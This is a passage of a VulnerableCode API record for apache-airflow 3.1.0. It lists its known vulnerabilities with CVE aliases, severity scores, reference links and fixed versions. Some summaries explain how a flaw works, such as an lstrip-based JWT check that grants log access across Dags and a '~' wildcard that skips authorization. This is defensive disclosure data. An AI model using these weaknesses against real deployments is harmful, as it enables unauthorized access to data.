Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/36203?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/36203?format=api", "purl": "pkg:pypi/apache-airflow@3.1.0", "type": "pypi", "namespace": "", "name": "apache-airflow", "version": "3.1.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "3.2.2", "latest_non_vulnerable_version": "3.2.2", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/102183?format=api", "vulnerability_id": "VCID-1432-ssnn-ekaq", "summary": "API users via `/api/v2/dagReports` could perform Dag code execution in the context of the api-server if the api-server was deployed in the environment where Dag files were available.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62402", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00512", "scoring_system": "epss", "scoring_elements": "0.66929", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00512", "scoring_system": "epss", "scoring_elements": "0.6702", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-62402" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/apache/airflow/commit/828aaa0b1d95caf90612a648867c17aec7e87874", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/commit/828aaa0b1d95caf90612a648867c17aec7e87874" }, { "reference_url": "https://github.com/apache/airflow/pull/56609", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/pull/56609" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2025/10/29/7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2025/10/29/7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62402", "reference_id": "CVE-2025-62402", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62402" }, { "reference_url": "https://github.com/advisories/GHSA-273c-4g26-4jpm", "reference_id": "GHSA-273c-4g26-4jpm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-273c-4g26-4jpm" }, { "reference_url": "https://lists.apache.org/thread/vbzxnxn031wb998hsd7vqnvh4z8nx6rs", "reference_id": "vbzxnxn031wb998hsd7vqnvh4z8nx6rs", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-10-31T03:55:28Z/" } ], "url": "https://lists.apache.org/thread/vbzxnxn031wb998hsd7vqnvh4z8nx6rs" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34926?format=api", "purl": "pkg:pypi/apache-airflow@3.1.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-881f-vbac-rucw" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bftx-1hw8-z7f1" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-gbn8-8y8d-gkgw" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-r2bq-ukcr-1fa3" }, { "vulnerability": "VCID-srr5-3rxv-rkg8" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-u2bm-499h-2qfh" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.1" } ], "aliases": [ "CVE-2025-62402", "GHSA-273c-4g26-4jpm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1432-ssnn-ekaq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69712?format=api", "vulnerability_id": "VCID-2j7p-89b9-t7e8", "summary": "Exploitation requires the attacker to already be an authenticated Airflow worker holding a valid Log-server JWT issued for at least one Dag. Apache Airflow's Log server authorized JWT tokens against Dag IDs by applying Python's `str.lstrip()` to the requested path segment when verifying the JWT's `sub` claim. `str.lstrip()` strips any of a *set* of characters from the left (not a prefix), so a JWT issued for a Dag named e.g. `dag_a` would authorize log access to any other Dag whose name began with any subset of the characters `{d, a, g, _}` (e.g. `dag_attacker`, `aaaa_target`, `_dag_secret`). Such an authenticated worker could enumerate and read worker logs of other Dags whose names happened to share that character-class prefix, leaking task output and error traces beyond the documented per-Dag isolation boundary. Affects deployments relying on per-Dag log-access scoping (multi-team, shared-executor, shared-worker topologies). Users are advised to upgrade to `apache-airflow` 3.2.2 or later.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45426", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16147", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00051", "scoring_system": "epss", "scoring_elements": "0.16291", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45426" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/05/31/13", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], "url": "http://www.openwall.com/lists/oss-security/2026/05/31/13" }, { "reference_url": "https://github.com/apache/airflow/pull/66749", "reference_id": "66749", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T14:58:23Z/" } ], "url": "https://github.com/apache/airflow/pull/66749" }, { "reference_url": "https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9", "reference_id": "hz1q7vg65vq2h4fobv5ww8tp257fbqj9", "reference_type": "", "scores": [ { "value": "3.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-01T14:58:23Z/" } ], "url": "https://lists.apache.org/thread/hz1q7vg65vq2h4fobv5ww8tp257fbqj9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-45426", "CVE-2026-45426", "PYSEC-2026-174" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2j7p-89b9-t7e8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88341?format=api", "vulnerability_id": "VCID-4n4v-jv1f-1bgk", "summary": "The example example_xcom that was included in airflow documentation implemented unsafe pattern of reading value\nfrom xcom in the way that could be exploited to allow UI user who had access to modify XComs to perform arbitrary\nexecution of code on the worker. Since the UI users are already highly trusted, this is a Low severity vulnerability.\n\nIt does not affect Airflow release - example_dags are not supposed to be enabled in production environment, however\nusers following the example could replicate the bad pattern. Documentation of Airflow 3.2.0 contains version of\nthe example with improved resiliance for that case.\n\nUsers who followed that pattern are advised to adjust their implementations accordingly.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54550", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1733", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17493", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-54550" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54550", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54550" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/15/1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/15/1" }, { "reference_url": "https://lists.apache.org/thread/3mf4cfx070ofsnf9qy0s2v5gqb5sc2g1", "reference_id": "3mf4cfx070ofsnf9qy0s2v5gqb5sc2g1", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-16T11:56:37Z/" } ], "url": "https://lists.apache.org/thread/3mf4cfx070ofsnf9qy0s2v5gqb5sc2g1" }, { "reference_url": "https://github.com/apache/airflow/pull/63200", "reference_id": "63200", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-16T11:56:37Z/" } ], "url": "https://github.com/apache/airflow/pull/63200" }, { "reference_url": "https://github.com/advisories/GHSA-q2hg-643c-gw8h", "reference_id": "GHSA-q2hg-643c-gw8h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q2hg-643c-gw8h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "CVE-2025-54550", "GHSA-q2hg-643c-gw8h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-4n4v-jv1f-1bgk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/121096?format=api", "vulnerability_id": "VCID-5r2q-cc18-v7cx", "summary": "When user logged out, the JWT token the user had authtenticated with was not invalidated, which could lead to reuse of that token in case it was intercepted. In Airflow 3.2 we implemented the mechanism that implements token invalidation at logout. Users who are concerned about the logout scenario and possibility of intercepting the tokens, should upgrade to Airflow 3.2+\n\n\n\nUsers are recommended to upgrade to version 3.2.0, which fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57735", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09268", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.0003", "scoring_system": "epss", "scoring_elements": "0.09215", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57735" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57735", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57735" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/09/16", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/09/16" }, { "reference_url": "https://github.com/apache/airflow/pull/56633", "reference_id": "56633", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T13:53:16Z/" } ], "url": "https://github.com/apache/airflow/pull/56633" }, { "reference_url": "https://github.com/apache/airflow/pull/61339", "reference_id": "61339", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T13:53:16Z/" } ], "url": "https://github.com/apache/airflow/pull/61339" }, { "reference_url": "https://github.com/advisories/GHSA-c92r-g8j5-vhcx", "reference_id": "GHSA-c92r-g8j5-vhcx", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-c92r-g8j5-vhcx" }, { "reference_url": "https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98", "reference_id": "ovn8mpd8zkc604hojt7x3wsw3kc60x98", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T13:53:16Z/" } ], "url": "https://lists.apache.org/thread/ovn8mpd8zkc604hojt7x3wsw3kc60x98" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/92193?format=api", "purl": "pkg:pypi/apache-airflow@3.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.0" } ], "aliases": [ "CVE-2025-57735", "GHSA-c92r-g8j5-vhcx" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5r2q-cc18-v7cx" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71072?format=api", "vulnerability_id": "VCID-7q3b-su3j-y7b4", "summary": "Apache Airflow versions 3.0.0 through 3.1.7 FastAPI DagVersion listing API does not apply per-DAG authorization filtering when the request is made with dag_id set to \"~\" (wildcard for all DAGs). As a result, version metadata of DAGs that the requester is not authorized to access is returned.\n\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26929", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17312", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17476", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-26929" }, { "reference_url": "https://github.com/advisories/GHSA-4m3h-wp5w-5hqh", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4m3h-wp5w-5hqh" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-14.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-14.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26929", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26929" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/03/17/4", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/03/17/4" }, { "reference_url": "https://github.com/apache/airflow/pull/61675", "reference_id": "61675", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:40:34Z/" } ], "url": "https://github.com/apache/airflow/pull/61675" }, { "reference_url": "https://lists.apache.org/thread/g5o6khx83jwqvdyn0mlyb0krt35cs9ss", "reference_id": "g5o6khx83jwqvdyn0mlyb0krt35cs9ss", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:40:34Z/" } ], "url": "https://lists.apache.org/thread/g5o6khx83jwqvdyn0mlyb0krt35cs9ss" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/91427?format=api", "purl": "pkg:pypi/apache-airflow@3.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-6vv8-kr7f-mubf" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8" } ], "aliases": [ "BIT-airflow-2026-26929", "CVE-2026-26929", "GHSA-4m3h-wp5w-5hqh", "PYSEC-2026-14" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7q3b-su3j-y7b4" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91248?format=api", "vulnerability_id": "VCID-881f-vbac-rucw", "summary": "When a DAG failed during parsing, Airflow’s error-reporting in the UI could include the full kwargs passed to the operators. If those kwargs contained sensitive values (such as secrets), they might be exposed in the UI tracebacks to authenticated users who had permission to view that DAG. \n\nThe issue has been fixed in Airflow 3.1.4 and 2.11.1, and users are strongly advised to upgrade to prevent potential disclosure of sensitive information.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65995", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03604", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03589", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-65995" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2025/12/12/2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2025/12/12/2" }, { "reference_url": "https://lists.apache.org/thread/1qzlrjo2wmlzs0rrgzgslj2pzkor0dr2", "reference_id": "1qzlrjo2wmlzs0rrgzgslj2pzkor0dr2", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-23T15:47:06Z/" } ], "url": "https://lists.apache.org/thread/1qzlrjo2wmlzs0rrgzgslj2pzkor0dr2" }, { "reference_url": "https://github.com/apache/airflow/pull/58252", "reference_id": "58252", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-23T15:47:06Z/" } ], "url": "https://github.com/apache/airflow/pull/58252" }, { "reference_url": "https://github.com/apache/airflow/pull/61883", "reference_id": "61883", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": 